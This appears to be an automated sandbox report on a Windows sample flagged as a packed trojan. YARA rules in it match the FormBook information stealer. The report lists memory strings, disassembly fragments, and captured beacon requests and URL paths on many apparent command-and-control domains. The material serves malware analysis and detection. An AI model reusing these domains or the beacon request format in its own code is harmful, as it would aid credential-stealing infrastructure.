          Source: Binary string: d2d1.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: PhotoMetadataHandler.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: SettingSyncPolicy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: msvcp140.amd64.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: msoshext.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: ES.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows.pdb2R source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
          Source: Binary string: TileDataRepository.pdb-S| source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: fltLib.pdbm source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: Windows.ImmersiveShell.ServiceProvider.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: framedynos.pdbt8 source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: npmproxy.pdb?jO source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: staterepository.core.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: npmproxy.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: msxml6.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: DataExchange.pdb9S@ source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: twinapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: cryptngc.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: UIAnimation.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: DXP.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdb source: WerFault.exe, 0000000A.00000003.740856862.000001EDC6DF0000.00000004.00000001.sdmp
          Source: Binary string: wtsapi32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: comctl32.pdb source: WerFault.exe, 0000000A.00000003.729628969.000001EDC6F2D000.00000004.00000001.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: edputil.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then mov esp, ebp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then jmp 04AB276Eh
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: global trafficHTTP traffic detected: GET /bsl/?2d=hxlpdRkxCvtTgBzP&mt=B72SzM4OK6YheLE+tS6SAH+1fBRAvDBThfWED1RPUqC7thw4cowf+3ukjA/mpLG53kNi HTTP/1.1Host: www.g2vies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzP HTTP/1.1Host: www.edu4go.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /bsl/?2d=hxlpdRkxCvtTgBzP&mt=B72SzM4OK6YheLE+tS6SAH+1fBRAvDBThfWED1RPUqC7thw4cowf+3ukjA/mpLG53kNi HTTP/1.1Host: www.g2vies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzP HTTP/1.1Host: www.edu4go.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: SearchUI.exe, 00000016.00000003.839516541.000001B8D2042000.00000004.00000001.sdmpString found in binary or memory: www.yahoo.@ equals www.yahoo.com (Yahoo)
          Source: unknownDNS traffic detected: queries for: www.thesunchronical.com
          Source: explorer.exe, 00000010.00000003.836779593.00000000062E8000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
          Source: SearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: SearchUI.exe, 00000016.00000002.914254001.000001B8D1BAF000.00000004.00000001.sdmpString found in binary or memory: http://facebook.github.io/react/docs/error-decoder.html?invariant
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmpString found in binary or memory: http://ns.adb
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.668183280.00000000082A1000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.668183280.00000000082A1000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.668183280.00000000082A1000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
          Source: SearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: SearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683345162.00000000024A1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000002.00000002.751926871.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.cbothwelltest2020081703.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.cbothwelltest2020081703.com/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.cbothwelltest2020081703.com/bsl/www.luohu666.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.cbothwelltest2020081703.comReferer:
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.edu4go.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.edu4go.com/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.edu4go.com/bsl/www.infomgt.net
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.edu4go.comReferer:
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.estivalconsultancy.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.estivalconsultancy.com/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.estivalconsultancy.com/bsl/www.furnacerepairtacoma.net
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.estivalconsultancy.comReferer:
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.furnacerepairtacoma.net
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.furnacerepairtacoma.net/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.furnacerepairtacoma.net/bsl/www.listenmelody.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.furnacerepairtacoma.netReferer:
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.g2vies.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.g2vies.com/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.g2vies.com/bsl/www.edu4go.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.g2vies.comReferer:
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.gvanmp.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.gvanmp.com/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.gvanmp.com/bsl/www.whatchicken.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.gvanmp.comReferer:
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.infomgt.net
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.infomgt.net/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.infomgt.net/bsl/www.renttoowngenius.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.infomgt.netReferer:
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.jokerwirewheels.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.jokerwirewheels.com/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.jokerwirewheels.com/bsl/www.smoothsailingexpress.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.jokerwirewheels.comReferer:
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.listenmelody.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp, explorer.exe, 00000010.00000002.1047288395.00000000063EC000.00000004.00000001.sdmpString found in binary or memory: http://www.listenmelody.com/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp, explorer.exe, 00000010.00000002.1047288395.00000000063EC000.00000004.00000001.sdmpString found in binary or memory: http://www.listenmelody.comReferer:
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.luohu666.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.luohu666.com/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.luohu666.com/bsl/www.gvanmp.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.luohu666.comReferer:
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.renttoowngenius.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.renttoowngenius.com/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.renttoowngenius.com/bsl/www.jokerwirewheels.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.renttoowngenius.comReferer:
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.serenityhomedits.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.serenityhomedits.com/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.serenityhomedits.com/bsl/www.g2vies.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.serenityhomedits.comReferer:
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.smoothsailingexpress.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.smoothsailingexpress.com/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.smoothsailingexpress.com/bsl/www.theprintshop.ink
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.smoothsailingexpress.comReferer:
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.theprintshop.ink
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.theprintshop.ink/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.theprintshop.ink/bsl/www.cbothwelltest2020081703.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.theprintshop.inkReferer:
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.thesunchronical.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.thesunchronical.com/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.thesunchronical.com/bsl/www.serenityhomedits.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.thesunchronical.comReferer:
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.whatchicken.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.whatchicken.com/bsl/
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.whatchicken.com/bsl/www.estivalconsultancy.com
          Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.whatchicken.comReferer:
          Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: SearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nel
          Source: SearchUI.exe, 00000016.00000002.910509404.000001B8D0EE3000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?c
          Source: SearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
          Source: SearchUI.exe, 00000016.00000002.911665172.000001B8D128D000.00000004.00000001.sdmp, SearchUI.exe, 00000016.00000003.830851464.000001B8D12E5000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
          Source: SearchUI.exe, 00000016.00000002.910509404.000001B8D0EE3000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cingr
          Source: SearchUI.exe, 00000016.00000002.916371805.000001B8D20E0000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/news/feed?market=en-us&query=
          Source: SearchUI.exe, 00000016.00000002.915055024.000001B8D1DD1000.00000004.00000001.sdmpString found in binary or memory: https://mths.be/fromcodepoint
          Source: SearchUI.exe, 00000016.00000002.911449678.000001B8D1204000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com/
          Source: SearchUI.exe, 00000016.00000002.911449678.000001B8D1204000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWrite
          Source: SearchUI.exe, 00000016.00000002.918398229.000001B8D25E0000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
          Source: SearchUI.exe, 00000016.00000002.911449678.000001B8D1204000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/api/v2.0/Users(
          Source: SearchUI.exe, 00000016.00000002.911449678.000001B8D1204000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/profile/v0/users/
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683345162.00000000024A1000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683345162.00000000024A1000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683345162.00000000024A1000.00000004.00000001.sdmpString found in binary or memory: https://www.google.comT
          Source: WerFault.exe, 0000000A.00000003.731420901.000001EDC784C000.00000004.00000001.sdmpBinary or memory string: GetRawInputData
          Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 7108, type: MEMORY

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
